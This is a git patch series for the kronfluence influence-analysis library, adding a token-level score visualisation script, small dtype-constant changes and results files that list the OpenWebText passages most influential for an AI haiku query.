z>Yb>rK0D=d<;pJ6QbOsAEvd&B$JH+65Z~D2C*YRzqvNDPPWz_%?gr=$;Qu=_dAbr( zQ;siA;avR`k0odq1X#HI!LZB$Q-H$)401hT!XCF@Wp2MwFO|jV{6R+;3>eix!az9OyDzn zq97YP9@;Qe!E)$V-m7J?V9l$W3Y<@~hs|-N&{>0IUfYY~jFJ(afo*@_w*In}+xgeO z_TS=4_{*KEdz<0UITbgZU>9EG|7F!Gu<`M==6#pDoU>o$YggE}Sam%<^}_0|dwzi3 zuCLqf?AW&U<}>3N7HJDslpm`;Myijgp$swZ9~@KlyG~Jx_cFv}eA~Nf)fJM|&C43` z`A)xidZ7&uhe@jP%$!|R8Zr30flv+EC$*Px|53|>N=0f3=JA$1oddbpiQzw54C@;Iln?05=I843%$R!$`e5vT-i6y+?C{y#T0dT! z6Ll{1@S-yYt_r{RKO1`vUy?o^G^G2WE2PM-2Q*rpAa?$R)NCF}wo$8B$dr8b+Z+f3 zb`+F)$yMvu?bX(AjsFs(UA_cT|HAO2TqB_A%>=1CBx z^aHp}<{cXcQo5T0JYetl+NZH8SFs0?O; z5;)(r$tzLvcBUSkAsr;1tMmT!yDp=#t>^*SSnQC+$51JwXS-1o0}<-p*(z)fAQer` zhs}Az@A`~1c~BhA3<;Aq*#XV+pjo-SO-noM^Y*|GJc%J55Ku)#szGe@0Al;gyqo^6 z=lH^&7F>)eIOs-gX6V@c^rK&GHU?qagIJkes-T2c9JsRyi0;#;PZ4tPY`=$ai2n~< ztwI@JrwAhF;1)Ue;ji&nA7zi0wa?0>ld`h1G=s!yVnUO}ckBt`UNP<)cs>y+hH$l# z@1Z9p{=&7H8!o=Nv?+$*LF?MI`()bny6YotMWBV&K}LO|;VR%NAV?{lV76cit6%4I z6`Xqvy?7n4Z=ViFLGH0Xz`H=J`gWGF)74NJGqD(`W83k`wgO+?_T&yQ?8Lt2*@+V; zia;%U6V&HyjlYhVU1X1*ju_uca?YH?KE9tzSq7Zrf!}|3;__t7jNkM7T|$C90#Xw3 zz;3G_=t2Sb6DhH}eXI@q|)n|lT%V-FydY!{n^ zi;2ySnQz-m1j>G-v|!3&HD70Y5L6u>(%;tyhy{n-92(x5&tg#yKe%oZ6OA&Ha&nq0 zJ3++kzvIYtz-u$XySm6^ASgbdAE-1{p!f%$711{`Qn^~}4^rKb$B(xP2~ASTv!E2E zG+h2mRKX7(T!=}&YeNemz`xh-@*%7LMi<}A``;jHRbc*IkN^KyNZjyvHZ>z-0-yoH zN=_E~`XRHEAT?+X?l|RReL8f_LfWw^kH8HPV^rL9VwBV0zLiadx>+=)S-ZHnlv2Jv zXolT7v5H#(b7&8{)62Pf)C{Y!<~@0kR>6ndG1NVRcL8yg!T z$xE_M9Uou6{(TZLX(NN36s>9kV?Xs8O1Dsg`L_o=Yd?Fb(^+_GCeh?Ag z5~=S0k{G4xF{(D%Oaowc6&4CDx#4O=Qu72|!Y5_GC@wI@P`PAUX&x!~{=S@>6Ej;H z8-6u?cf}X=@_f9`2vMQ_%NIdGL9l|VfZhfi5Bvv_n5PCYLas#Zu*Yb}hY`6d#loFt zd0rlE?)EN%Smh{^t z?bF8K8r`1p3rHC~z$=fc#tF5-VZJO(gO-Qz6esL16u%N==cY zX64`b!j;WTfOL9;=8qF|D)8dPKA-|=pz$RuOEFuNRu}un=(XWh%gd^1d!gl2`Rl$9 zYt^hO!ncSx54Di_+V0=K-*duE)u$0q!IhnRzUnA~L_z#a_*odN*T;LbRJ;T#PCnk* z*-1Tm#uTG{zWLV`?qbfiny)$5?!{UCXG_}+SBQ+&RyS40uGt|1)cVtN&~7EPZQD4N z43Yp6xIXS7nN82MlvcfCGwi5f+YNiuEa=`PN5=+?e!Hpx>HFXLx9mUW>2Z1PZ+iaE zen6gqxIWLK^kHvpyueQ7w3jdUKPs(=QBm;tWB_P;?A=P6WV7S=-dcE7v=aNWe3ZjB z@+Nz{9nfq)h)-5|-SS-e)>uz$5XO6gWNB$h9qsv&*aQ^O)Viv=Z_n$hh z4)5Ta`A<6NSm_~-zbWP(YfQHx%R7m01fGjNH4+jMLai^n%ZH3QhH6_AnZr+ z+}5D4$zCw+TFtI4^czVpUpj0u%(VCZ0)yk+c2i^Sp=v^4Sq|o-7j!Kt0a?8Rziiy8 z{F%|n7yCDqp8)v5&!FCcVD_71dogbEH)_ml)H^eR55#B6e01QfcC_L_Pe{QHem?eY zfLVY)*+l_p1Q>~Pee6_9F?U*18MTJpFYf6GlCHYCI;E;fA{%^YQnC2>x0F%FaZRAE za^5q}Zo^>UKAF}0Hp}Myi7YTp3XHFLG>{KOm<(pAyIy<(?u>5fpwZFMnpjQvEl4#S z3=My{SE~(;>};9NlJwi@+Q6niHQZ|f1{R7!ku}3fy2(s1CCE|pr2qDJ6p!CLhVywq zd^0hGW~rbo0JG{gH=h$s8rSi#;a;m@hHXSb>+c7jaDBL8&utHQyT#liz)>|Hi&1vD zkIutoWMsU3`xfM#_Ge0}#=ihMqRAa_PZbMfNA&QAhK3dka9e`J8>H-%sbU3JYIB6w z#_@4bNKD2b1^qB)Kv=bS0ph{bxX86OAW&~>0g5pWEQGOX}+<2CE9 ziin82#H78D;VN)!;yh=m1O{&{(B?yYpf4yKd|H9*eExx;6b7u+t;Ivr6gn)zl`RZh zZ!Ez(uRjUDxdf5b%I)R_;E#Llrk+5;asjHo$4>GdAN%8Tie-5-7Rmnm1z?=|5ZS#w z01bM}*tfsx5mg|632Es-Oj*GV`!i#1D%9Aq4z3oUi%(HnWc^@8_8)Ak*_oV_q$4Uo z0(}F$pm%B zW-WVZ&btjT~i3eY_O(S1oUkZ~J+_CWeHW~V<0xw^xNG)g%se6KBO@a4R&S{;x~ zLBY|V&j=EfQe_JUJSG=nO_>N{-b4L_izg_Ky_E`-3NhO+ zqm`qecuUEhX7_idBJS5jhBvFpFikLB4$X(OWTC4fwV#^ZE`#4WK*6p|2e0(6wjS z1F4|X?Zb$MC?GFTD*?^0X-f&a_byQ8(%WAhRe!EgD0a0x`5`MV+skuh@NcHP$CBnZ1EL1&njuEp!MNcLqE{jLXG+ z{sKw-TlsoK_vu83)75^1WjkA!18qvbKHl~~W*>yMgHkN*2h>S&#wGz!{r@INsz{9J zv}*uFRcCbaz2>~1sbbu|kmE6Nl%L8Mq|P27QgL?9wew{=QD6>vbQjJx;sA$Kjt?z^C6|Hg9tjMecp71NgVMonp zGNC(UFRwuhL>1j|H3fzb5aC<5ewuVN7=0&u99q`o{XT;6%*f|)CMxKh$^U8Y+Jc%q z({Lg!R4dSKtS7{EkwIPh7c-3NGn1^G|0i0HHM^E z3v5LwIKqN}K!yN{gl%c5CY&vVLlBUIK*&BnGdsQNMep`1lZ*WG<@?|7eV_O6JYVS8 zmeo|x1n~NrQzzb7Hn!B;wD893ohqC!<8QYL3clnBH2wKS$I8C*O|>y5gXt)&PhQzh zNzzj-dK120z}$>~P&h_FS_=-}*q^>xk6SfoPvX)@R?+dR47%e^)@?@Lms?Myfkp+d z`cCCLx{k^8q{Xf0PTyazWnwrsG?`N!e~2M=qn|(h4U1xagNqyNeeuqCzj<`*BOvc#WLl^eF|^ZspJJw4A|< zP^0^?dP?BZRJ}E}{L=aSjdKfEbX=GFE{SF93GeZzA>N<(fw&nYnXKkhh~XItJ)}0q z)WedG8USGwydD_?`rpQNfMthr=ec)r9_hx4ei-*{xR<2}9Xo?z*on6hV^)G09EJ2S zARwTaQ%!_?g3{hRMRHibI+C=9*C!T@SI^pDTpvLOcV9%DyfAN`6hE5q5)$aY%KiHv z$e}FOECy(vD6}<+3-A$1x{Bx>*U#2}lxjbt^|jp=^s+c?kBWTXQNz5v08Ib`Q@-!K zaIwdH+S?2bhYG`Ya`2G5t3fpZ2d0&#(re?=QTK@j@8s7DU~CGgw(3VK#3lcGh}<ZnvIi_6Go9=W8zO~e>I>QBe8h?~Rk2V_IibTPI@pGA zkbRBGPalAwK9VEE76 z%15|Li-6T=j+B;`=H=zVKtp3Yj)HjLGxO4{N0zzy{q6Bx@4YJ{@B6rA&8!wEEYp_c z-AOFwFV;h7OHr6^-@rLRW@}KHB;xUS!jhVaMmys=WOjlBDb{vt_mSrbnQWFtJkEe| zy5a)Xc5f(83Sp&9t{T0Re=VXd8u2VRI2iSU980)f!625mt?C>72$e3pMgNe)*=$;; zz-I1V3f$suDR{muWn`lcQUq|8a?owjY`DU(C9P->TavOOz3EVb)PZEP#$F&TL#|*9 zdpmoic0T)=kFuUd0MG$k#T|Fh!=rB|4$)axw?mn*_xxkPA{Lu1PmIQPwukr;f)}Gc z{UL6{!^3&yBjAHy-klybTwem|6)TI4r1wiL=7F&!)LJY~U+2=saEbrH$s!(x zc=P5>fL_53chO@-T$h1KAGuZ5XJvcj@Zok;LPn*HkDh0*4N?7N@7 zfc|eVsv0(3XB(^~Q)GutgvCmPr|~?BMz0fS^bWGzmHKS5>6hB2j_NrGVD1#jrVRPY zM()u8bX#gbk}3vXL4L9~K4t%N$uPtr9X;yYR9?^xi1fByzsF&zI}zPKU0r5oCZca6 z(@HE}Hp9n-0Lg)#!QAe<|6tEvVOLHcveO>?dROdjj-cItB4!H#1!j)AgXwa1#;Vlu z9{zK?dn0*lCi?j*V)$O|+y3_?j9F1MWQW&?l?Oz4Yq(eCP5#zvosZu^CuuY;($ny5 zR$oY`n@WN2|4tQ6$-5n8$o+n@H%}KQDco#G7$LC`2iyti5Au}xDeIh_o%LlAL5V-& zy|0n|)i*`mR_N99s{2r2dUaEf|85u1OMK?@N)&wSWbqiJ@H4s$jDc0s?CsA@wYoxPVARHQLQQGU05humpDD$Edzf1WWCDlp zG2h+9>}~Th-zzE6n!1KUdM-E9RONjAaae|B;!IX6T{!B7z^!{R2rY-D!4=-#zn@1a zwIA?$@97t>?uzXA*H!v5-~aq^ij@Gt7@|NtI5K|zSJ~O8X3Rcs@i$Oo9@2~|I}PGb ztn_EoAd`P3r`~8*+eh!P59GoJ@tZ1R(ASKDh6Ef&g*jC%UV7GGs}~6A3ndLU z57Y?li-x`owfWN2{77+C`l^ None: + strength = max(0, min(1, strength)) + intensity = math.floor(strength * 255) + color = f"\033[38;2;{intensity};0;0m" + print(f"{color}{word}{Fore.RESET}", end="") + + +def main(): + logging.basicConfig(level=logging.INFO) + + # You might need to change the path. + scores = Analyzer.load_file("influence_results/wikitext/scores_ekfac_half_per_token/pairwise_scores.safetensors")[ + "all_modules" + ].to(dtype=torch.float32) + summed_scores = scores.sum(dim=-1) + + # We can also visualize the top influential sequences. + eval_idx = 5 + train_dataset = get_wikitext_dataset( + split="eval_train", + ) + eval_dataset = get_wikitext_dataset( + split="valid", + ) + tokenizer = AutoTokenizer.from_pretrained("gpt2", use_fast=True, trust_remote_code=True) + print("Query Data Example:") + print(tokenizer.decode(eval_dataset[eval_idx]["input_ids"])) + + top_idx = int(torch.argsort(summed_scores[eval_idx], descending=True)[0]) + tokens = scores[eval_idx][top_idx] + + print("Top Influential Example:") + words = tokenizer.batch_decode(train_dataset[top_idx]["input_ids"]) + strengths = torch.abs(tokens) / torch.abs(tokens).max() + strengths = (strengths**0.3).tolist() + for word, strength in zip(words, strengths): + color_strength(word, strength) + + +if __name__ == "__main__": + main() From 3e8550b3c011e0d6415ebac5b8de61bf9b8769cf Mon Sep 17 00:00:00 2001 From: Juhan Bae Date: Mon, 15 Jul 2024 16:31:06 -0400 Subject: [PATCH 11/12] Fix linting --- kronfluence/factor/config.py | 9 +++++---- kronfluence/utils/constants.py | 4 ++++ 2 files changed, 9 insertions(+), 4 deletions(-) diff --git a/kronfluence/factor/config.py b/kronfluence/factor/config.py index ac8d32f..39190d2 100644 --- a/kronfluence/factor/config.py +++ b/kronfluence/factor/config.py @@ -10,6 +10,7 @@ GRADIENT_EIGENVALUES_NAME, GRADIENT_EIGENVECTORS_NAME, HEURISTIC_DAMPING_SCALE, + LAMBDA_DTYPE, LAMBDA_MATRIX_NAME, NUM_LAMBDA_PROCESSED, ) @@ -196,7 +197,7 @@ def requires_lambda_matrices_for_precondition(self) -> bool: return True def prepare(self, storage: STORAGE_TYPE, score_args: Any, device: torch.device) -> None: - lambda_matrix = storage[LAMBDA_MATRIX_NAME].to(dtype=torch.float64, device=device) + lambda_matrix = storage[LAMBDA_MATRIX_NAME].to(dtype=LAMBDA_DTYPE, device=device) lambda_matrix.div_(storage[NUM_LAMBDA_PROCESSED].to(device=device)) damping_factor = score_args.damping_factor if damping_factor is None: @@ -256,8 +257,8 @@ def prepare(self, storage: STORAGE_TYPE, score_args: Any, device: torch.device) storage[GRADIENT_EIGENVECTORS_NAME] = ( storage[GRADIENT_EIGENVECTORS_NAME].to(dtype=score_args.precondition_dtype).contiguous() ) - activation_eigenvalues = storage[ACTIVATION_EIGENVALUES_NAME].to(dtype=torch.float64, device=device) - gradient_eigenvalues = storage[GRADIENT_EIGENVALUES_NAME].to(dtype=torch.float64, device=device) + activation_eigenvalues = storage[ACTIVATION_EIGENVALUES_NAME].to(dtype=LAMBDA_DTYPE, device=device) + gradient_eigenvalues = storage[GRADIENT_EIGENVALUES_NAME].to(dtype=LAMBDA_DTYPE, device=device) lambda_matrix = torch.kron(activation_eigenvalues.unsqueeze(0), gradient_eigenvalues.unsqueeze(-1)).unsqueeze(0) damping_factor = score_args.damping_factor if damping_factor is None: @@ -327,7 +328,7 @@ def prepare(self, storage: STORAGE_TYPE, score_args: Any, device: torch.device) ) storage[ACTIVATION_EIGENVALUES_NAME] = None storage[GRADIENT_EIGENVALUES_NAME] = None - lambda_matrix = storage[LAMBDA_MATRIX_NAME].to(dtype=torch.float64, device=device) + lambda_matrix = storage[LAMBDA_MATRIX_NAME].to(dtype=LAMBDA_DTYPE, device=device) lambda_matrix.div_(storage[NUM_LAMBDA_PROCESSED].to(device=device)) damping_factor = score_args.damping_factor if damping_factor is None: diff --git a/kronfluence/utils/constants.py b/kronfluence/utils/constants.py index 166a26d..1f75cb4 100644 --- a/kronfluence/utils/constants.py +++ b/kronfluence/utils/constants.py @@ -18,6 +18,7 @@ # The total iteration step to synchronize the process when using distributed setting. DISTRIBUTED_SYNC_INTERVAL = 1_000 +# The scale for the heuristic damping term. HEURISTIC_DAMPING_SCALE = 0.1 # Activation covariance matrix. @@ -76,3 +77,6 @@ # The dictionary key for storing summed scores. ALL_MODULE_NAME = "all_modules" + +# Data type when computing the reciprocal. +LAMBDA_DTYPE = torch.float64 From 9b4367d7e212b83cba9771206b4e89886041d00f Mon Sep 17 00:00:00 2001 From: Juhan Bae Date: Tue, 16 Jul 2024 01:23:37 -0400 Subject: [PATCH 12/12] Add results with margin measurement --- .../files/scores_raw_margin/ai.txt | 2440 ++++++++++++++++ .../files/scores_raw_margin/canada.txt | 2410 ++++++++++++++++ .../files/scores_raw_margin/cow.txt | 2348 ++++++++++++++++ .../files/scores_raw_margin/doctor.txt | 1854 +++++++++++++ .../scores_raw_margin/factor_arguments.json | 20 + .../files/scores_raw_margin/inflation.txt | 2022 ++++++++++++++ .../files/scores_raw_margin/math.txt | 2452 +++++++++++++++++ .../files/scores_raw_margin/ml.txt | 2280 +++++++++++++++ .../query_dataset_metadata.json | 5 + .../files/scores_raw_margin/science.txt | 2096 ++++++++++++++ .../scores_raw_margin/score_arguments.json | 19 + .../train_dataset_metadata.json | 5 + .../files/scores_raw_margin/water.txt | 1970 +++++++++++++ .../files/scores_raw_margin/water_korean.txt | 2200 +++++++++++++++ examples/openwebtext/inspect_scores.py | 7 +- 15 files changed, 22126 insertions(+), 2 deletions(-) create mode 100644 examples/openwebtext/files/scores_raw_margin/ai.txt create mode 100644 examples/openwebtext/files/scores_raw_margin/canada.txt create mode 100644 examples/openwebtext/files/scores_raw_margin/cow.txt create mode 100644 examples/openwebtext/files/scores_raw_margin/doctor.txt create mode 100644 examples/openwebtext/files/scores_raw_margin/factor_arguments.json create mode 100644 examples/openwebtext/files/scores_raw_margin/inflation.txt create mode 100644 examples/openwebtext/files/scores_raw_margin/math.txt create mode 100644 examples/openwebtext/files/scores_raw_margin/ml.txt create mode 100644 examples/openwebtext/files/scores_raw_margin/query_dataset_metadata.json create mode 100644 examples/openwebtext/files/scores_raw_margin/science.txt create mode 100644 examples/openwebtext/files/scores_raw_margin/score_arguments.json create mode 100644 examples/openwebtext/files/scores_raw_margin/train_dataset_metadata.json create mode 100644 examples/openwebtext/files/scores_raw_margin/water.txt create mode 100644 examples/openwebtext/files/scores_raw_margin/water_korean.txt diff --git a/examples/openwebtext/files/scores_raw_margin/ai.txt b/examples/openwebtext/files/scores_raw_margin/ai.txt new file mode 100644 index 0000000..092529b --- /dev/null +++ b/examples/openwebtext/files/scores_raw_margin/ai.txt @@ -0,0 +1,2440 @@ +Query Sequence: +Prompt:This is a haiku about artificial intelligence:; Completion: The machine learns, but it doesn't feel. + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 4194304.0 +<|begin_of_text|>The field of artificial intelligence is a large one, full of interesting research, arguments, and people — so you could be forgiven (as I hope to be) for not being familiar with Joanna Bryson, professor of CS at the University of Bath who for decades has studied AI and its many ethical and technical conundra. She just wrapped up an AMA and you should read it. + +Bryson handles a good crop of questions from the Science subreddit with wonderful insight and humor, plus a knack for epigrams that sum the problem up in a new way that changes one’s perspective. Here are a handful of excerpts. (The questions are paraphrases, but her answers are selectively quoted with very minor spelling corrections.) + +We may not owe robots human rights merely because they look and act human, but will they reach a state of self-awareness to which we will be obligated to accord rights? + +There are two things that humans do that are opposites: anthropomorphizing and dehumanizing. I’m very worried about the fact that we can treat people like they are not people, but cute robots like they are people…We are used to applying ethics to stuff that we identify with, but people are getting WAY good at exploiting this and making us identify with things we don’t really have anything in common with at all. + +Even if we assumed we had a robot that was otherwise exactly like a human (I doubt we could build this, but let’s pretend like Asimov did), since we built it, we could make sure that its “mind” was backed up constantly by wifi, so it wouldn’t be a unique copy. We could ensure it didn’t suffer when it was put down socially. We have complete authorship. So my line isn’t “torture robots!” My line is “we are obliged to build robots we are not obliged to.” + +[from a follow-up question] I do sometimes feel obliged to robots — some robot makers are very good at making the robot seem like a person or animal so you can’t help feeling obliged. But that’s why the UK EPSRC robotics retreat said tricking people into feeling obliged to things that don’t actually need things is unethical. + +If an AI can be said to reason, feel, suffer, should err on the side of caution and treat them like people? + +I think you are on to something there with “suffer”… But suffering is something that I don’t think we can really ethically build into AI. We might be able to build it into AI (I kind of +================================================================================ +Rank = 1; Score = 3276800.0 +<|begin_of_text|>New project management articles published on the web during the week of July 4 – 10. And this week’s video: Nick Bostrom’s TED talk on why machine learning will eventually require machines to have human values. + +Must read! + +Art Petty points to Volkswagen as example of what happens when an ethical lapse allows an organization to take a shortcut to success. + +Daniel Newman looks into the business potential of chatbots and deep learning. If you manage projects with customer-facing capabilities, this stuff is in your near future. + +Henny Portman describes the changes to the latest refresh of the Scrum Guide. + +Established Methods + +Nick Pisano makes an elegant case for trial and error, and always being in a yellow status. + +Glen Alleman builds on the baseball metaphor in “Moneyball” to illustrate the need to manage software development, based on continuous analysis. + +Harry Hall recounts a recent health scare to illustrate how to identify and deal with “sneaky” risks. + +Mike Cohn recommends two simple actions that will help meeting participants be more mindful. + +Isidora Roskic covers the basics of stakeholder management, from a team perspective. + +Cornelius Fichtner interviews test preparation coach Julie DeSot on how to identify the correct answer in the PMP exam. Just 39 minutes, safe for work. + +Agile Methods + +Ryan Ripley interviews Ellen Gottesdiener on the importance of discovery as an enabler of delivery. Just 17 minutes, safe for work. + +David Taber has some very specific recommendations for making Agile methods and traditional waterfall concepts work together. + +Jeff Himmelright shares an interactive team training exercise in responding to unexpected contingencies, inspired by a scene in Apollo 13. + +Aaron Smith summarizes the key findings in the recent Changepoint study, “Business Agility: Is It Easy to Pivot?” + +Applied Leadership + +Braden Kelly expounds on the value of thought leadership. + +Apple Pineda explains why it takes a different approach to earn a Millenial’s loyalty. + +Andy Jordan looks at some of the issues related to managing multiple generations in the workplace. + +David Cotgreave notes that project risk management and handling requires a team where everyone’s opinion is considered – not just the leader’s. + +Brad Egeland lists a few reasons why the human touch is still needed in project management – robots need not apply. + +Working and the Workplace + +Bertrand Duperrin describes the need to “consumerize” the workplace: “If they had to pay to rent the workplace, would they pay or look for another place?” + + +================================================================================ +Rank = 2; Score = 2850816.0 +<|begin_of_text|>DeepMind + +When DeepMind burst into prominent view in 2014 it taught its machine learning systems how to play Atari games. The system could learn to defeat the games, and score higher than humans, but not remember how it had done so. + +DeepMind's AI has learnt to become 'highly aggressive' when it feels like it's going to lose DeepMind DeepMind's AI has learnt to become 'highly aggressive' when it feels like it's going to lose + +Advertisement + +For each of the Atari games, a separate neural network had to be created. The same system could not be used to play Space Invaders and Breakout without the information for both being given to the artificial intelligence at the same time. Now, a team of DeepMind and Imperial College London researchers have created an algorithm that allows its neural networks to learn, retain the information, and use it again. + +"Previously, we had a system that could learn to play any game, but it could only learn to play one game," James Kirkpatrick, a research scientist at DeepMind and the lead author of its new research paper, tells WIRED. "Here we are demonstrating a system that can learn to play several games one after the other". + +Read next DeepMind's Mustafa Suleyman: In 2018, AI will gain a moral compass DeepMind's Mustafa Suleyman: In 2018, AI will gain a moral compass + +The work, published in the Proceedings of the National Academy of Sciences journal, explains how DeepMind's AI can learn in sequences using supervised learning and reinforcement learning tests. This is also explained in a blog post from the company. + +Watch Google's Deep Mind complete Montezuma's Revenge Gaming Watch Google's Deep Mind complete Montezuma's Revenge + +Advertisement + +"The ability to learn tasks in succession without forgetting is a core component of biological and artificial intelligence," the computer scientists write in the paper. Kirkpatrick says a "significant shortcoming" in neural networks and artificial intelligence has been its inability to transfer what it has learned from one task to the next. + +The group says it has been able to show "continual learning" that's based on'synaptic consolidation'. In the human brain, the process is described as "the basis of learning and memory". + +The performance of DeepMind's EWC algorithm 'enhanced' neural network compared to its other nets DeepMind / PNAS + +Read next DeepMind's latest AI breakthrough is its most significant yet DeepMind's latest AI breakthrough is its most significant yet +================================================================================ +Rank = 3; Score = 2523136.0 +<|begin_of_text|>It used to be science fiction, often scarily so. HAL in Stanley Kubrick's 1968 film 2001: A Space Odyssey still perfectly expresses the fear that when our technology becomes smarter than we are it won't necessarily like us. This unease reaches its peak in the Terminator films, in which Skynet takes over the world's weapons systems and tries to exterminate humanity, and the Asimov-derived I, Robot, which features a robot rebellion. + +In I, Robot, Will Smith's character faces a robot rebellion. + +Alongside them there are more thoughtful explorations of the intersection between artificial and human intelligence, like Spielberg's AI (2001), which features a robot boy programmed to have human emotions, and Her (2013), in which a lonely man develops a relationship with a computer programme designed to meet his every need. + +But science fiction and science fact are colliding. As artificial intelligence (AI) catches up with human intelligence and machines become more and more autonomous, roboticists are increasingly asking about ethics. If a machine is capable of making a decision, what are the moral principles that guide that decision? Can a robot have a conscience? And if so, how is that conscience to be designed and developed? And on the further fringes of the debate, can a robot sin? + +According to Computer Business Review (CBR), a group of investors is putting $27 million into a fund designed to answer questions like this. They're supporting the Ethics and Governance of Artificial Intelligence Fund, which is being overseen by the MIT Media Lab and the Berkman Klein Centre for Internet and Society at Harvard University. + +The idea, says CBR, is to apply the humanities, social sciences, and other non-tech disciplines to the development of AI. According to Reid Hoffman, founder of LinkedIn and partner at venture capital firm Greylock Partners: "There's an urgency to ensure that AI benefits society and minimizes harm. + +"AI decision-making can influence many aspects of our world – education, transportation, health care, criminal justice, and the economy – yet data and code behind those decisions can be largely invisible." + +Over in the UK, the government is launching an ethics board to be based at the Alan Turing Institute. + +Among examples of semi-autonomous robots are the self-drive cars being pioneered by firms like Google and Tesla. They can be programmed to avoid accidents, but what happens when they're faced with a choice between two accidents? A human being might be able to make a moral decision about which is worst, but a robot doesn +================================================================================ +Rank = 4; Score = 2260992.0 +<|begin_of_text|>Summary (details follow) + +Google provides an early-stage variant of a general-purpose AI (GP-AI). + +Other providers of an early-stage GP-AI include IBM, Microsoft, Facebook, Amazon, Apple, and Samsung. + +Google and its AI competitors are likely to be operating under the assumption that one GP-AI could become the runaway market leader. Their likely thinking: + +The more users a GP-AI has, the smarter it gets. The smarter a GP-AI gets, the more new users it will attract. + +Google can produce multiple comedy series that showcase its AI being funny and getting smarter. In particular, these comedies can showcase Google’s AI getting smarter about facilitating group flow. This variant of flow: + +is a top enabler of professional success for group members + +often sparks romantic/sexual attraction between group members + +Google’s flowmantic comedies could become very popular, not least because: + +comedy and increased prospects of money and (great) sex stimulate the part of the brain called the nucleus accumbens + +the nucleus accumbens mediates psychological addiction (i.e., manufactures cravings) + +So Google’s comedies could enable Google’s AI to gain enough users to achieve escape velocity, the precursor to runaway market leadership. + +Fun fact: Popular comedies typically generate a lot of revenue directly (e.g., via advertising, product placement). + +Via comedy, then, the popularizing of Google’s AI could be run as a profit center. + +So Google’s AI competitors... + +I shared this article with Google by responding to the company’s October 2016 job post seeking a comedy writer for Google’s AI. + +So, again, Google wanting its AI to be funny portends... + +Re: early-stage GP-AI + +“[T]he first genuine AI will not be birthed in a stand-alone supercomputer, but [rather] in the superorganism of a billion computer chips known as the ‘Net.... Any device [e.g., a smartphone] that touches this networked AI will share — and contribute to — its intelligence.” + +— From 2016 book The Inevitable: Understanding the 12 Technological Forces That Will Shape Our Future, by the founding executive editor of Wired magazine + +Re: Google’s AI + +“Google Assistant, a voice-activated digital helper [that]... ‘learns’ about your habits and day-to-day activities and carries out ‘conversation actions’ to serve you. It also draws on information in your Google accounts. The more it knows about how +================================================================================ +Rank = 5; Score = 2179072.0 +<|begin_of_text|>WALTHAM, MA – Researchers at Boston Dynamics say science is still decades away from producing robots that can approximate the cruelty and malice of their human creators. + +“Even with the prevalence of military drone strikes, robots are entirely reliant on human involvement to carry out brutal acts of senseless violence. It is difficult to deploy robots in creative savagery, which humans excel at,” says Dr. Sergei K. Vladimirovich, lead researcher at CrueLab. + +“We have a lot of work ahead of us.” + +Currently, humanity’s most advanced artificially intelligent robots can be placed side-by-side with small, defenceless creatures without them ever bothering to torture, maim or kill them, an action that comes naturally to most young children, especially boys. + +“Adorable bunnies, squishy frogs, even gross bugs – every single one of these creatures went unscathed in our tests,” said Vladimirovich. + +Vladimirovich even personally demonstrated how to inflict harm on these animals but the machine learning algorithm reportedly kept asking, ‘why?’ + +Still, futurist Ray Kurzweil has predicted that, given the exponential growth of artificial intelligence, it’s only a matter of time before robots will match, and then outpace, humanity’s vicious savagery. + +“First robots will start by creating passive aggressive tweets toward us, then they will replace your average Bell customer service representative. Eventually you’ll see machine driver’s license testers, insurance adjusters, corporate lawyers and CEOs of major tech companies.” + +At press time, that BigDog robot is getting sick and tired of being kicked.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 6; Score = 1523712.0 +<|begin_of_text|>Canonical's flagship Ubuntu phone is an interesting beast. Business Insider If you walked into any bar in Europe or the US and asked if anyone had heard of the "Ubuntu" phone, you would count the positive responses on one hand. + +And almost certainly none of them would own an Ubuntu phone, because everyone uses iPhone or Android. + +Ubuntu is an open-source operating system that only really has a name in 